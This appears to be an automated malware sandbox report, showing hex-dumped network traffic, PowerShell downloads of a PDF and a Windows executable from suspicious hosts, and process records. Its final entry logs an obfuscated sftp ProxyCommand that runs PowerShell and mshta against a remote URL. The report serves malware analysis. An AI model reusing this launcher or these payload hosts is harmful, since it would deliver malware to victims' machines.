                                                                                    2024-12-17 07:38:17 UTC1369INData Raw: 77 32 63 63 33 32 45 33 33 6c 33 38 45 32 63 78 33 32 4e 33 33 52 33 35 46 32 63 52 33 32 76 33 35 52 33 35 4c 32 63 6e 33 32 59 33 34 6e 33 31 4c 32 63 52 33 32 6d 33 34 61 33 32 53 32 63 72 33 32 4b 33 33 53 33 37 52 32 63 64 33 32 4f 33 35 51 33 35 53 32 63 44 33 32 61 33 33 6c 33 39 65 32 63 45 33 32 4d 33 35 6e 33 33 57 32 63 77 33 32 47 33 35 6d 33 32 61 32 63 44 33 32 79 33 33 57 33 37 53 32 63 59 33 32 55 33 33 6c 33 37 6f 32 63 7a 33 32 41 33 33 45 33 36 48 32 63 76 33 32 66 33 34 45 33 30 53 32 63 6c 33 32 55 33 33 61 33 36 69 32 63 77 33 32 79 33 33 42 33 35 72 32 63 4b 33 32 6e 33 35 48 33 31 62 32 63 6c 33 32 52 33 33 50 33 33 4b 32 63 41 33 32 7a 33 35 4f 33 32 73 32 63 6f 33 32 41 33 33 73 33 36 49 32 63 63 33 32 63 33 33 54 33 36 43 32 63
                                                                                    Data Ascii: w2cc32E33l38E2cx32N33R35F2cR32v35R35L2cn32Y34n31L2cR32m34a32S2cr32K33S37R2cd32O35Q35S2cD32a33l39e2cE32M35n33W2cw32G35m32a2cD32y33W37S2cY32U33l37o2cz32A33E36H2cv32f34E30S2cl32U33a36i2cw32y33B35r2cK32n35H31b2cl32R33P33K2cA32z35O32s2co32A33s36I2cc32c33T36C2c
                                                                                    2024-12-17 07:38:17 UTC1369INData Raw: 32 63 66 33 32 77 33 33 65 33 35 76 32 63 62 33 32 6a 33 35 51 33 34 67 32 63 46 33 32 70 33 33 4e 33 39 57 32 63 67 33 32 57 33 33 55 33 35 6c 32 63 4e 33 32 44 33 33 52 33 33 77 32 63 53 33 32 5a 33 33 4a 33 33 51 32 63 52 33 32 65 33 33 62 33 33 70 32 63 53 33 32 76 33 35 68 33 35 49 32 63 7a 33 32 57 33 35 71 33 33 56 32 63 6c 33 32 47 33 34 4b 33 32 5a 32 63 6e 33 32 79 33 34 59 33 31 72 32 63 4f 33 32 4c 33 34 41 33 31 4d 32 63 56 33 32 4c 33 34 43 33 32 7a 32 63 58 33 32 45 33 33 67 33 33 47 32 63 6d 33 32 4f 33 33 64 33 38 78 32 63 48 33 32 61 33 35 4f 33 34 4b 32 63 48 33 32 46 33 33 58 33 34 4a 32 63 67 33 32 79 33 35 41 33 30 47 32 63 73 33 32 73 33 33 49 33 39 54 32 63 41 33 32 52 33 33 42 33 36 47 32 63 65 33 32 4f 33 34 55 33 31 47 32 63 74
                                                                                    Data Ascii: 2cf32w33e35v2cb32j35Q34g2cF32p33N39W2cg32W33U35l2cN32D33R33w2cS32Z33J33Q2cR32e33b33p2cS32v35h35I2cz32W35q33V2cl32G34K32Z2cn32y34Y31r2cO32L34A31M2cV32L34C32z2cX32E33g33G2cm32O33d38x2cH32a35O34K2cH32F33X34J2cg32y35A30G2cs32s33I39T2cA32R33B36G2ce32O34U31G2ct
                                                                                    2024-12-17 07:38:18 UTC1369INData Raw: 63 68 33 32 75 33 35 6d 33 35 77 32 63 46 33 32 6c 33 35 78 33 31 71 32 63 65 33 32 57 33 35 77 33 35 55 32 63 66 33 32 69 33 33 62 33 36 6d 32 63 49 33 32 4e 33 33 4e 33 35 72 32 63 5a 33 32 71 33 33 55 33 36 6c 32 63 54 33 32 65 33 35 49 33 33 73 32 63 48 33 32 45 33 33 6a 33 36 58 32 63 6e 33 32 66 33 33 56 33 39 47 32 63 7a 33 32 5a 33 35 55 33 33 6b 32 63 5a 33 32 65 33 35 6a 33 34 78 32 63 69 33 32 6d 33 33 6e 33 37 63 32 63 75 33 32 49 33 35 43 33 30 56 32 63 41 33 32 47 33 35 72 33 33 72 32 63 5a 33 32 41 33 34 63 33 32 61 32 63 63 33 32 46 33 33 69 33 33 61 32 63 6e 33 32 5a 33 33 68 33 35 7a 32 63 4d 33 32 55 33 35 6d 33 34 6a 32 63 73 33 32 63 33 34 52 33 31 75 32 63 47 33 32 58 33 35 43 33 32 68 32 63 72 33 32 67 33 34 78 33 31 79 32 63 42 33
                                                                                    Data Ascii: ch32u35m35w2cF32l35x31q2ce32W35w35U2cf32i33b36m2cI32N33N35r2cZ32q33U36l2cT32e35I33s2cH32E33j36X2cn32f33V39G2cz32Z35U33k2cZ32e35j34x2ci32m33n37c2cu32I35C30V2cA32G35r33r2cZ32A34c32a2cc32F33i33a2cn32Z33h35z2cM32U35m34j2cs32c34R31u2cG32X35C32h2cr32g34x31y2cB3
                                                                                    2024-12-17 07:38:18 UTC1369INData Raw: 4e 33 32 44 33 33 72 33 36 74 32 63 50 33 32 68 33 35 4d 33 33 6d 32 63 54 33 32 59 33 33 6d 33 39 77 32 63 70 33 32 5a 33 33 78 33 39 74 32 63 63 33 32 44 33 33 68 33 36 4e 32 63 6a 33 32 4a 33 34 4c 33 32 6c 32 63 47 33 32 6c 33 35 45 33 35 6c 32 63 53 33 32 68 33 34 6a 33 31 71 32 63 43 33 32 65 33 34 67 33 30 46 32 63 62 33 32 50 33 35 74 33 33 52 32 63 4f 33 32 56 33 33 69 33 34 41 32 63 51 33 32 64 33 35 72 33 35 6d 32 63 46 33 32 51 33 35 6f 33 34 6b 32 63 73 33 32 71 33 33 57 33 39 45 32 63 73 33 32 46 33 35 6d 33 31 65 32 63 64 33 32 61 33 35 54 33 35 6d 32 63 70 33 32 76 33 35 75 33 33 4b 32 63 74 33 32 72 33 33 53 33 33 4d 32 63 4b 33 32 50 33 34 7a 33 32 4e 32 63 61 33 32 4b 33 34 56 33 32 63 32 63 74 33 32 52 33 35 67 33 31 43 32 63 73 33 32
                                                                                    Data Ascii: N32D33r36t2cP32h35M33m2cT32Y33m39w2cp32Z33x39t2cc32D33h36N2cj32J34L32l2cG32l35E35l2cS32h34j31q2cC32e34g30F2cb32P35t33R2cO32V33i34A2cQ32d35r35m2cF32Q35o34k2cs32q33W39E2cs32F35m31e2cd32a35T35m2cp32v35u33K2ct32r33S33M2cK32P34z32N2ca32K34V32c2ct32R35g31C2cs32
                                                                                    2024-12-17 07:38:18 UTC1369INData Raw: 33 32 42 33 33 4e 33 39 79 32 63 5a 33 32 61 33 35 42 33 34 4f 32 63 48 33 32 68 33 35 70 33 31 70 32 63 57 33 32 61 33 35 54 33 30 42 32 63 57 33 32 61 33 33 50 33 39 61 32 63 42 33 32 64 33 34 46 33 30 46 32 63 57 33 32 45 33 33 49 33 36 4a 32 63 76 33 32 61 33 33 46 33 34 56 32 63 57 33 32 63 33 35 5a 33 30 67 32 63 6c 33 32 44 33 33 76 33 38 4e 32 63 4b 33 32 65 33 33 76 33 35 74 32 63 54 33 32 72 33 33 63 33 39 58 32 63 55 33 32 42 33 33 50 33 36 75 32 63 6c 33 32 4b 33 33 78 33 39 43 32 63 77 33 32 48 33 33 63 33 35 55 32 63 52 33 32 73 33 33 53 33 37 67 32 63 63 33 32 55 33 33 54 33 38 74 32 63 42 33 32 6d 33 35 51 33 30 54 32 63 66 33 32 43 33 33 51 33 37 58 32 63 69 33 32 4d 33 34 6d 33 31 65 32 63 63 33 32 6c 33 33 6f 33 36 75 32 63 4c 33 32 4b
                                                                                    Data Ascii: 32B33N39y2cZ32a35B34O2cH32h35p31p2cW32a35T30B2cW32a33P39a2cB32d34F30F2cW32E33I36J2cv32a33F34V2cW32c35Z30g2cl32D33v38N2cK32e33v35t2cT32r33c39X2cU32B33P36u2cl32K33x39C2cw32H33c35U2cR32s33S37g2cc32U33T38t2cB32m35Q30T2cf32C33Q37X2ci32M34m31e2cc32l33o36u2cL32K
                                                                                    2024-12-17 07:38:18 UTC1369INData Raw: 32 76 33 35 7a 33 33 7a 32 63 62 33 32 46 33 33 57 33 37 77 32 63 4b 33 32 53 33 33 45 33 35 52 32 63 69 33 32 4d 33 34 54 33 31 78 32 63 4f 33 32 44 33 35 62 33 31 63 32 63 79 33 32 52 33 33 51 33 34 57 32 63 64 33 32 55 33 35 72 33 34 67 32 63 45 33 32 6d 33 34 45 33 31 57 32 63 62 33 32 42 33 34 5a 33 31 41 32 63 50 33 32 74 33 35 41 33 30 43 32 63 57 33 32 61 33 35 64 33 34 54 32 63 72 33 32 73 33 34 51 33 30 41 32 63 48 33 32 61 33 33 71 33 38 54 32 63 6f 33 32 71 33 33 73 33 39 75 32 63 66 33 32 63 33 35 56 33 31 47 32 63 4f 33 32 71 33 34 73 33 30 58 32 63 4e 33 32 69 33 35 70 33 33 68 32 63 6d 33 32 53 33 34 68 33 31 55 32 63 43 33 32 59 33 33 46 33 34 58 32 63 6e 33 32 77 33 35 66 33 32 6c 32 63 45 33 32 71 33 33 5a 33 35 65 32 63 77 33 32 6b 33
                                                                                    Data Ascii: 2v35z33z2cb32F33W37w2cK32S33E35R2ci32M34T31x2cO32D35b31c2cy32R33Q34W2cd32U35r34g2cE32m34E31W2cb32B34Z31A2cP32t35A30C2cW32a35d34T2cr32s34Q30A2cH32a33q38T2co32q33s39u2cf32c35V31G2cO32q34s30X2cN32i35p33h2cm32S34h31U2cC32Y33F34X2cn32w35f32l2cE32q33Z35e2cw32k3
                                                                                    2024-12-17 07:38:18 UTC1369INData Raw: 4c 33 33 55 33 39 61 32 63 69 33 32 66 33 33 53 33 37 71 32 63 69 33 32 53 33 34 65 33 31 44 32 63 73 33 32 75 33 33 5a 33 38 79 32 63 55 33 32 58 33 33 58 33 38 71 32 63 77 33 32 58 33 33 56 33 34 6e 32 63 52 33 32 42 33 33 48 33 35 47 32 63 48 33 32 52 33 33 73 33 35 6d 32 63 70 33 32 56 33 35 68 33 32 6e 32 63 57 33 32 61 33 35 6e 33 35 4c 32 63 7a 33 32 51 33 35 7a 33 34 66 32 63 74 33 32 59 33 33 79 33 34 62 32 63 44 33 32 45 33 33 53 33 38 58 32 63 65 33 32 6e 33 34 76 33 32 45 32 63 71 33 32 67 33 33 49 33 38 67 32 63 58 33 32 4c 33 35 6a 33 33 51 32 63 5a 33 32 72 33 34 4f 33 31 57 32 63 4e 33 32 6d 33 35 63 33 33 75 32 63 6b 33 32 4d 33 33 71 33 37 66 32 63 58 33 32 70 33 35 75 33 32 74 32 63 44 33 32 67 33 33 44 33 39 44 32 63 7a 33 32 56 33 33
                                                                                    Data Ascii: L33U39a2ci32f33S37q2ci32S34e31D2cs32u33Z38y2cU32X33X38q2cw32X33V34n2cR32B33H35G2cH32R33s35m2cp32V35h32n2cW32a35n35L2cz32Q35z34f2ct32Y33y34b2cD32E33S38X2ce32n34v32E2cq32g33I38g2cX32L35j33Q2cZ32r34O31W2cN32m35c33u2ck32M33q37f2cX32p35u32t2cD32g33D39D2cz32V33
                                                                                    2024-12-17 07:38:18 UTC1369INData Raw: 33 35 62 33 35 4b 32 63 71 33 32 42 33 33 6a 33 38 51 32 63 48 33 32 49 33 35 4f 33 35 46 32 63 68 33 32 77 33 33 6c 33 34 67 32 63 4f 33 32 48 33 35 52 33 31 70 32 63 53 33 32 4f 33 35 53 33 31 4a 32 63 48 33 32 57 33 35 7a 33 30 63 32 63 51 33 32 7a 33 35 52 33 34 70 32 63 65 33 32 57 33 33 47 33 34 76 32 63 4b 33 32 70 33 35 45 33 32 6d 32 63 6f 33 32 53 33 34 73 33 32 6d 32 63 4e 33 32 57 33 33 42 33 38 65 32 63 59 33 32 6b 33 35 43 33 34 51 32 63 48 33 32 70 33 33 4c 33 39 61 32 63 41 33 32 52 33 35 43 33 32 54 32 63 42 33 32 47 33 35 41 33 33 48 32 63 71 33 32 59 33 33 61 33 37 4b 32 63 70 33 32 71 33 35 56 33 33 59 32 63 44 33 32 66 33 33 42 33 37 7a 32 63 56 33 32 66 33 34 76 33 30 6b 32 63 56 33 32 56 33 34 45 33 32 67 32 63 77 33 32 41 33 35 69
                                                                                    Data Ascii: 35b35K2cq32B33j38Q2cH32I35O35F2ch32w33l34g2cO32H35R31p2cS32O35S31J2cH32W35z30c2cQ32z35R34p2ce32W33G34v2cK32p35E32m2co32S34s32m2cN32W33B38e2cY32k35C34Q2cH32p33L39a2cA32R35C32T2cB32G35A33H2cq32Y33a37K2cp32q35V33Y2cD32f33B37z2cV32f34v30k2cV32V34E32g2cw32A35i


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.1049711188.245.211.2254438052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 07:38:22 UTC64OUTGET /Mcyga.pdf HTTP/1.1
                                                                                    Host: qu.ax
                                                                                    Connection: Keep-Alive
                                                                                    2024-12-17 07:38:22 UTC275INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Tue, 17 Dec 2024 07:38:22 GMT
                                                                                    Content-Type: application/pdf
                                                                                    Content-Length: 5165
                                                                                    Connection: close
                                                                                    Last-Modified: Thu, 12 Dec 2024 14:53:22 GMT
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    Alt-Svc: h3=":443"; ma=604800
                                                                                    Accept-Ranges: bytes
                                                                                    2024-12-17 07:38:22 UTC5165INData Raw: 25 50 44 46 2d 31 2e 33 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 50 61 72 65 6e 74 20 31 20 30 20 52 0a 2f 52 65 73 6f 75 72 63 65 73 20 32 20 30 20 52 0a 2f 43 6f 6e 74 65 6e 74 73 20 34 20 30 20 52 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 37 34 33 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 85 54 5d 4f e3 30 10 7c e7 57 ac 78 02 09 99 38 1f 4d 02 4f a1 04 e8 09 da aa 0d 87 4e e2 c5 24 0e f5 29 8d 23 db 29 f0 ef 6f dd b4 a5 69 91 ee ad 75 d6 33 bb 33 b3 76 e1 d7 89 43 82 10 3e 4e 6e 32 b8 bc a3 40 5d e2 38 90 95 90 66 f6 88 d2 90 b8 31 84 71 40 c2 10 b2 02 ce 9e 5a d3 b2 0a 86 b2 2e 45 c1 6b 23 58 25 cc 17 24 ef 8a f3 25 fe 87
                                                                                    Data Ascii: %PDF-1.33 0 obj<</Type /Page/Parent 1 0 R/Resources 2 0 R/Contents 4 0 R>>endobj4 0 obj<</Filter /FlateDecode /Length 743>>streamxT]O0|Wx8MON$)#)oiu33vC>Nn2@]8f1q@Z.Ek#X%$%


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.1049713172.67.140.1514438052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 07:38:24 UTC82OUTGET /bdd.exe HTTP/1.1
                                                                                    Host: denek.local-wanderer.shop
                                                                                    Connection: Keep-Alive
                                                                                    2024-12-17 07:38:25 UTC593INHTTP/1.1 200 OK
                                                                                    Date: Tue, 17 Dec 2024 07:38:24 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 14104424
                                                                                    Connection: close
                                                                                    Accept-Ranges: bytes
                                                                                    ETag: "1b4971205e6226df6b9b11527f70a14f"
                                                                                    Last-Modified: Sun, 15 Dec 2024 09:55:28 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8f3540e13bec8ce8-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1778&min_rtt=1770&rtt_var=680&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2874&recv_bytes=696&delivery_rate=1591280&cwnd=237&unsent_bytes=0&cid=8b33fc88d17423b5&ts=595&x=0"
                                                                                    2024-12-17 07:38:25 UTC1369INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: MZP@!L!This program must be run under Win64$7
                                                                                    2024-12-17 07:38:25 UTC1369INData Raw: 11 40 00 00 00 00 00 10 05 49 6e 74 36 34 00 00 00 00 00 00 00 80 ff ff ff ff ff ff ff 7f 02 00 00 00 00 00 00 00 00 88 11 40 00 00 00 00 00 10 06 55 49 6e 74 36 34 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 02 00 00 00 00 00 00 00 b0 11 40 00 00 00 00 00 10 09 4e 61 74 69 76 65 49 6e 74 00 00 00 00 00 00 00 80 ff ff ff ff ff ff ff 7f 02 00 00 00 00 d8 11 40 00 00 00 00 00 10 0a 4e 61 74 69 76 65 55 49 6e 74 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 02 00 00 00 00 12 40 00 00 00 00 00 04 06 53 69 6e 67 6c 65 00 02 00 00 00 00 00 00 18 12 40 00 00 00 00 00 04 08 45 78 74 65 6e 64 65 64 01 02 00 00 00 00 30 12 40 00 00 00 00 00 04 06 44 6f 75 62 6c 65 01 02 00 00 00 00 00 00 48 12 40 00 00 00 00 00 04 04 52 65 61 6c 01 02 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: @Int64@UInt64@NativeInt@NativeUInt@Single@Extended0@DoubleH@Real
                                                                                    2024-12-17 07:38:25 UTC1369INData Raw: 00 00 00 00 02 0a 45 6e 74 72 79 43 6f 75 6e 74 02 00 38 11 40 00 00 00 00 00 04 00 00 00 00 00 00 00 02 07 5f 46 69 6c 6c 65 72 02 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 02 07 45 6e 74 72 69 65 73 02 00 02 00 00 00 00 00 08 17 40 00 00 00 00 00 0e 07 54 4d 65 74 68 6f 64 10 00 00 00 00 00 00 00 00 02 00 00 00 18 11 40 00 00 00 00 00 00 00 00 00 00 00 00 00 02 04 43 6f 64 65 02 00 18 11 40 00 00 00 00 00 08 00 00 00 00 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b b0 ce 40 00 00 00 00 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 00 00 00 00 02 12 00 17 40 00 00 00 00 00 04 4c 65 66 74 02 00 12 00 17 40 00 00 00 00 00 05 52 69 67 68 74 02 00 02 00 0b d0 ce 40 00 00 00 00 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00
                                                                                    Data Ascii: EntryCount8@_FillerEntries@TMethod@Code@Data@&op_Equality@@Left@Right@&op_Inequality
                                                                                    2024-12-17 07:38:25 UTC1369INData Raw: 02 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 18 11 40 00 00 00 00 00 00 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 3b 00 50 d1 40 00 00 00 00 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 00 00 00 00 18 00 01 08 e0 24 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 35 00 20 cc 40 00 00 00 00 00 09 43 6c 61 73 73 54 79 70 65 03 00 00 14 40 00 00 00 00 00 18 00 01 08 e0 24 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 44 00 30 cc 40 00 00 00 00 00 09 43 6c 61 73 73 4e 61 6d 65 03 00 88 13 40 00 00 00 00 00 20 00 02 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 88 13 40 00 00 00 00 00 00 00 01 01 02 00 02 00 49 00 50 cd 40 00 00 00 00 00 0b 43 6c 61 73 73 4e 61 6d 65 49 73 03 00 00 10 40 00 00 00 00 00
                                                                                    Data Ascii: Self@Instance;P@CleanupInstance$@Self5 @ClassType@$@SelfD0@ClassName@ Self@@IP@ClassNameIs@
                                                                                    2024-12-17 07:38:25 UTC1369INData Raw: 40 00 00 00 00 00 06 45 71 75 61 6c 73 03 00 00 10 40 00 00 00 00 00 20 00 02 08 e0 24 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 08 e0 24 40 00 00 00 00 00 00 00 03 4f 62 6a 02 00 02 00 37 00 50 d2 40 00 00 00 00 00 0b 47 65 74 48 61 73 68 43 6f 64 65 03 00 b8 10 40 00 00 00 00 00 18 00 01 08 e0 24 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 43 00 90 d6 40 00 00 00 00 00 08 54 6f 53 74 72 69 6e 67 03 00 88 13 40 00 00 00 00 00 20 00 02 08 e0 24 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 88 13 40 00 00 00 00 00 00 00 01 01 02 00 02 00 6f 00 80 d6 40 00 00 00 00 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 20 14 40 00 00 00 00 00 28 00 03 08 e0 24 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 08 e0 24 40 00 00 00 00 00 00 00
                                                                                    Data Ascii: @Equals@ $@Self$@Obj7P@GetHashCode@$@SelfC@ToString@ $@Self@@o@SafeCallException @($@Self$@
                                                                                    2024-12-17 07:38:25 UTC1369INData Raw: 00 00 00 70 64 41 00 00 00 00 00 80 64 41 00 00 00 00 00 e0 d6 40 00 00 00 00 00 b0 d6 40 00 00 00 00 00 a0 64 41 00 00 00 00 00 60 ce 40 00 00 00 00 00 70 d0 40 00 00 00 00 00 80 ce 40 00 00 00 00 00 90 ce 40 00 00 00 00 00 a0 ce 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 b8 10 40 00 00 00 00 00 08 00 00 00 09 46 52 65 66 43 6f 75 6e 74 02 00 00 00 03 00 71 27 40 00 00 00 00 00 4a 00 f6 ff ae 27 40 00 00 00 00 00 4a 00 f7 ff eb 27 40 00 00 00 00 00 4b 00 fa ff 00 00 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 3d 00 70 64 41 00 00 00 00 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 00 00 00 00 18 00 01 08 28 28 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 3d 00 80 64 41 00 00 00 00 00 11 42 65 66
                                                                                    Data Ascii: pdAdA@@dA`@p@@@@@FRefCountq'@J'@J'@KTInterfacedObject=pdAAfterConstruction((@Self=dABef
                                                                                    2024-12-17 07:38:25 UTC1369INData Raw: 00 02 00 00 00 00 00 00 00 00 e8 2c 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 2d 40 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 2c 40 00 00 00 00 00 00 00 00 00 00 00 00 00 ee 2c 40 00 00 00 00 00 10 00 00 00 00 00 00 00 00 19 40 00 00 00 00 00 40 d2 40 00 00 00 00 00 50 d2 40 00 00 00 00 00 90 d6 40 00 00 00 00 00 80 d6 40 00 00 00 00 00 c0 d6 40 00 00 00 00 00 d0 d6 40 00 00 00 00 00 e0 d6 40 00 00 00 00 00 b0 d6 40 00 00 00 00 00 30 ce 40 00 00 00 00 00 60 ce 40 00 00 00 00 00 70 d0 40 00 00 00 00 00 80 ce 40 00 00 00 00 00 90 ce 40 00 00 00 00 00 a0 ce 40 00 00 00 00 00 00 00 00 00 00 00 10 54 43 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 00 08 2d 40 00 00 00 00 00 07 10 54 43 75 73 74 6f 6d 41 74 74 72
                                                                                    Data Ascii: ,@-@,@,@@@@P@@@@@@@0@`@p@@@@TCustomAttribute-@TCustomAttr
                                                                                    2024-12-17 07:38:25 UTC1369INData Raw: 00 0d 13 54 56 61 72 41 72 72 61 79 42 6f 75 6e 64 41 72 72 61 79 08 00 00 00 01 00 00 00 00 31 40 00 00 00 00 00 01 00 00 00 00 00 00 00 00 02 00 a8 31 40 00 00 00 00 00 14 09 50 56 61 72 41 72 72 61 79 c0 31 40 00 00 00 00 00 02 00 00 00 00 c8 31 40 00 00 00 00 00 0e 09 54 56 61 72 41 72 72 61 79 20 00 00 00 00 00 00 00 00 06 00 00 00 f8 10 40 00 00 00 00 00 00 00 00 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 f8 10 40 00 00 00 00 00 02 00 00 00 00 00 00 00 02 05 46 6c 61 67 73 02 00 b8 10 40 00 00 00 00 00 04 00 00 00 00 00 00 00 02 0b 45 6c 65 6d 65 6e 74 53 69 7a 65 02 00 b8 10 40 00 00 00 00 00 08 00 00 00 00 00 00 00 02 09 4c 6f 63 6b 43 6f 75 6e 74 02 00 18 11 40 00 00 00 00 00 10 00 00 00 00 00 00 00 02 04 44 61 74 61 02 00 68 31 40 00 00
                                                                                    Data Ascii: TVarArrayBoundArray1@1@PVarArray1@1@TVarArray @DimCount@Flags@ElementSize@LockCount@Datah1@
                                                                                    2024-12-17 07:38:25 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 01 00 a8 11 40 00 00 00 00 00 06 41 56 61 6c 75 65 02 00 02 00 0a b0 70 41 00 00 00 00 00 06 43 72 65 61 74 65 00 00 00 00 00 00 00 00 00 00 01 00 18 11 40 00 00 00 00 00 06 41 56 61 6c 75 65 02 00 02 00 08 c0 70 41 00 00 00 00 00 09 54 6f 50 6f 69 6e 74 65 72 00 00 18 11 40 00 00 00 00 00 00 02 00 08 d0 70 41 00 00 00 00 00 09 54 6f 49 6e 74 65 67 65 72 00 00 a8 11 40 00 00 00 00 00 00 02 00 0b e0 70 41 00 00 00 00 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 00 00 00 00 02 00 78 36 40 00 00 00 00 00 04 4c 65 66 74 02 00 00 78 36 40 00 00 00 00 00 05 52 69 67 68 74 02 00 02 00 0b 00 71 41 00 00 00 00 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 00 00 00 00 02 00 78 36 40 00 00 00 00 00 04 4c
                                                                                    Data Ascii: @AValuepACreate@AValuepAToPointer@pAToInteger@pA&op_Equality@x6@Leftx6@RightqA&op_Inequality@x6@L
                                                                                    2024-12-17 07:38:25 UTC1369INData Raw: 00 c0 12 40 00 00 00 00 00 18 00 01 02 88 13 40 00 00 00 00 00 00 00 01 53 02 00 02 00 32 00 d0 71 41 00 00 00 00 00 09 4f 75 74 53 74 72 69 6e 67 03 00 c0 12 40 00 00 00 00 00 18 00 01 02 88 13 40 00 00 00 00 00 00 00 01 53 02 00 02 00 34 00 e0 71 41 00 00 00 00 00 0b 49 6e 4f 75 74 53 74 72 69 6e 67 03 00 c0 12 40 00 00 00 00 00 18 00 01 02 88 13 40 00 00 00 00 00 00 00 01 53 02 00 02 00 3e 00 f0 71 41 00 00 00 00 00 06 41 73 41 6e 73 69 03 00 b8 13 40 00 00 00 00 00 20 00 02 02 88 13 40 00 00 00 00 00 00 00 01 53 02 00 40 b8 13 40 00 00 00 00 00 00 00 01 01 02 00 02 00 3e 00 10 72 41 00 00 00 00 00 06 41 73 41 6e 73 69 03 00 b8 13 40 00 00 00 00 00 20 00 02 00 c0 12 40 00 00 00 00 00 00 00 01 53 02 00 40 b8 13 40 00 00 00 00 00 00 00 01 01 02 00 02 00
                                                                                    Data Ascii: @@S2qAOutString@@S4qAInOutString@@S>qAAsAnsi@ @S@@>rAAsAnsi@ @S@@


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:02:38:11
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Windows\System32\OpenSSH\sftp.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\OpenSSH\sftp.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')" .
                                                                                    Imagebase:0x7ff7e4d00000
                                                                                    File size:374'272 bytes
                                                                                    MD5 hash:72C41AA478CA868F95AD0936AF65818A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:1
                                                                                    Start time:02:38:11
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
